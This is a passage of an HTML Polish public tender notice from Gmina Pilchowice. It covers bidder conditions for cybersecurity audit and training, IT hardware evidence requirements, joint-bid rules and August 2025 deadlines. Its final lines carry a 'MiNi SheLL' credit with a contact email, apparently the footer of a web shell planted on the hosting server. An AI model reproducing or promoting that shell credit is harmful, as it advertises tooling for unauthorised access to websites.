class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	Na podstawie art. 112 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu dotyczące: <br/>3.1. zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie określa warunku w ww. zakresie. <br/>3.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli wynika to z odrębnych przepisów: <br/>Zamawiający nie określa warunku w ww. zakresie. <br/>3.3. sytuacji ekonomicznej lub finansowej <br/>dla części 3 postępowania - Wykonawca spełni warunek, jeżeli wykaże, że posiada ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie niższą niż 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100) <br/>3.4.	zdolności technicznej lub zawodowej: <br/>3.4.1. dla części 1 postępowania <br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>	dysponuje lub będzie dysponował zespołem audytorskim, tj. minimum 2 audytorami, z których każdy powinien posiadać jeden z certyfikatów, o których mowa w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu,<br/>	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 usługi audytów Systemu Zarządzania Bezpieczeństwem Informacji,<br/>3.4.2. dla części 2 postępowania <br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował trenerem, który ukończył studia wyższe na kierunku informatyka, cyberbezpieczeństwo lub pokrewnym, lub który posiada certyfikat potwierdzający kwalifikacje zawodowe z zakresu cyberbezpieczeństwa (np. CISSP, CompTIA Security+, CISM lub równoważne). <br/>Dopuszcza się przedstawienie dokumentów równoważnych, potwierdzających posiadanie wiedzy, umiejętności i kompetencji w zakresie prowadzenia szkoleń z cyberbezpieczeństwa.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <br/>5.	W przypadku, o którym mowa w ust. 4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobligowani są do złożenia wraz z ofertą oświadczenia, o którym mowa w art. 117 ust. 4 ustawy Pzp., tj. oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy, o treści załącznika nr 3 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich doświadczenia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu znajduje się w załączniku nr 5A do SWZ,<br/>	Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie. Wzór wykazu znajduje się w załączniku nr 6 do SWZ.<br/>Dla Części 2:<br/>	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich doświadczenia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu znajduje się w załączniku nr 5B do SWZ,<br/>Dla Części 3:<br/>	Kopię polisy lub inny dokument potwierdzający zawarcie umowy ubezpieczenia OC,<br/>Dla Części 4:<br/>Zamawiający nie wymaga przedłożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">sytuacji ekonomicznej lub finansowej <br/>dla części 3 postępowania - Wykonawca spełni warunek, jeżeli wykaże, że posiada ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie niższą niż 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100) <br/>3.4.	zdolności technicznej lub zawodowej: <br/>3.4.1. dla części 1 postępowania <br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>	dysponuje lub będzie dysponował zespołem audytorskim, tj. minimum 2 audytorami, z których każdy powinien posiadać jeden z certyfikatów, o których mowa w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu,<br/>	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 usługi audytów Systemu Zarządzania Bezpieczeństwem Informacji,<br/>3.4.2. dla części 2 postępowania <br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował trenerem, który ukończył studia wyższe na kierunku informatyka, cyberbezpieczeństwo lub pokrewnym, lub który posiada certyfikat potwierdzający kwalifikacje zawodowe z zakresu cyberbezpieczeństwa (np. CISSP, CompTIA Security+, CISM lub równoważne). <br/>Dopuszcza się przedstawienie dokumentów równoważnych, potwierdzających posiadanie wiedzy, umiejętności i kompetencji w zakresie prowadzenia szkoleń z cyberbezpieczeństwa.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 	karta katalogowa (produktowa) oferowanego serwera – zawierająca dane techniczne umożliwiające weryfikację zgodności z wymaganiami Zamawiającego,<br/>	deklaracja zgodności CE dla oferowanego serwera – w formie oświadczenia producenta lub dokumentu wystawionego przez uprawniony podmiot,<br/>	dokument potwierdzający, że oferowany serwer spełnia wymagania w zakresie efektywności środowiskowej, np. certyfikat EPEAT Silver (wydanie z 2019 r.) lub równoważny certyfikat środowiskowy, potwierdzający zgodność z analogicznymi kryteriami w zakresie efektywności energetycznej i środowiskowej.<br/>	dokument potwierdzający, że oferowany serwer został przetestowany pod kątem kompatybilności i znajduje się na liście Windows Server Catalog i/lub posiada status „Certified for Windows” dla następujących systemów:<br/>o	Microsoft Windows Server 2022<br/>o	Microsoft Windows Server 2025<br/>dopuszcza się inne równoważne potwierdzenie kompatybilności z systemami operacyjnymi o porównywalnej funkcjonalności i wymaganiach technicznych, zgodnie z art. 101 ust. 4 Ustawy Pzp.<br/>	oświadczenie producenta, że serwis urządzenia będzie realizowany przez producenta i/lub jego autoryzowanego partnera serwisowego lub inny podmiot zapewniający serwis o parametrach jakościowych nie gorszych niż serwis autoryzowany,<br/>	dokument potwierdzający, że podmiot realizujący serwis posiada wdrożony system zarządzania jakością zgodny z ISO 9001 lub równoważny oraz system zarządzania bezpieczeństwem informacji zgodny z ISO 27001 lub równoważny – w zakresie świadczenia usług serwisowych sprzętu IT.<br/>dostawa serwerów backup wraz dyskami dla Urzędu Gminy Pilchowice oraz Ośrodka Pomocy Społecznej w Pilchowicach (4 szt.)<br/>	karty produktowe oferowanych serwerów (obu typów) umożliwiające weryfikację ich parametrów.<br/>dostawa zasilaczy awaryjnych UPS dla Urzędu Gminy Pilchowice oraz Ośrodka Pomocy Społecznej w Pilchowicach (4 szt.):<br/>	karty katalogowe (produktowe) oferowanych urządzeń (obu typów), umożliwiające jednoznaczną weryfikację parametrów technicznych,<br/>	oświadczenie producenta lub dokument potwierdzający zgodność urządzeń z wymaganiami dyrektyw Unii Europejskiej oraz oznaczenie CE,<br/>	oświadczenie producenta, że oferowany sprzęt:<br/>	oświadczenie producenta, że:<br/>o	posiada pełne prawa/licencje do oprogramowania służącego do monitorowania pracy UPS,<br/>o	oprogramowanie to jest dostępne do pobrania ze strony internetowej producenta bez dodatkowych kosztów,<br/>o	aktualizacje tego oprogramowania będą możliwe w okresie eksploatacji urządzenia,<br/>	oświadczenie producenta, że serwis urządzeń będzie realizowany przez producenta lub przez podmiot przez niego autoryzowany, zapewniający usługi serwisowe równoważne pod względem jakości.<br/>dostawa oprogramowania do zbierania logów dla Urzędu Gminy Pilchowice<br/>	karta katalogowa (produktowa) oferowanego oprogramowania umożliwiająca weryfikację jego parametrów dostawa przełącznika sieciowego zarządzalnego dla Urzędu Gminy Pilchowice <br/>	karta katalogowa (produktowa) oferowanego agregatu, zawierająca dane techniczne umożliwiające weryfikację jego parametrów,<br/>	oświadczenie producenta lub dokument potwierdzający zgodność urządzeń z wymaganiami dyrektyw Unii Europejskiej oraz oznaczenie CE,<br/>	oświadczenie producenta, że serwis urządzenia będzie realizowany przez podmiot mający zapewniony dostęp do części zamiennych i materiałów eksploatacyjnych, w czasie umożliwiającym zachowanie ciągłości działania agregatu, oraz że dostępność magazynu części zapewniający ich dostawę w terminie nie dłuższym niż dni roboczych,<br/>	oświadczenie wykonawcy lub producenta, że istnieje możliwość przeprowadzenia prób fabrycznych (Factory Acceptance Test – FAT) przed dostarczeniem agregatu – na wniosek Zamawiającego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienia przedmiotowych środków dowodowych, jeśli Wykonawca nie złożył przedmiotowych środków dowodowych lub jeśli złożone środki dowodowe są niekompletne. Przedmiotowe środki dowodowe składa się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/ne do reprezentowania Wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający informuje, że dopuszcza możliwość, aby w niniejszym postępowaniu Wykonawcy wspólnie ubiegali się o udzielenie zamówienia, niezależnie od części postępowania. <br/>2.	Zamawiający wymaga, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowili pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu, a także do zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Zapis rozdziału XIII pkt. 2 nie dotyczy spółki cywilnej, o ile upoważnienie bądź pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź sytuacji, kiedy wszyscy wspólnicy spółki cywilnej podpiszą ofertę. <br/>4.	Zamawiający wymaga, aby oferta Wykonawców, którzy ubiegają się wspólnie o udzielenie zamówienia, została podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących łącznie (tj. przez każdego z Wykonawców lub przez upoważnionego pełnomocnika). <br/>5.	Zamawiający informuje, że w przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców – oświadczenie, o którym głosi Art. 125 Ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te winny potwierdzać spełnienie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia, wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia z postępowania – każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. <br/>6.	Zamawiający informuje, że zgodnie z zapisami Rozdziału XIII pkt. 5:<br/>	oświadczenie w zakresie braku podstaw do wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>	oświadczenie o spełnieniu warunków udziału w postępowaniu składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnienie, przy czym Zamawiający dopuszcza możliwość złożenia oświadczenia łącznie, czyli podpisane przez wszystkie podmioty składające wspólnie ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów. <br/>7.	Zamawiający informuje, że wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występujący w roli pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający informuje, że zmiana umowy może nastąpić w przypadkach, o których głosi Art. 455 Ust. 1 pkt 2-4 oraz Ust. 2 Ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://oneplace.marketplanet.pl;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com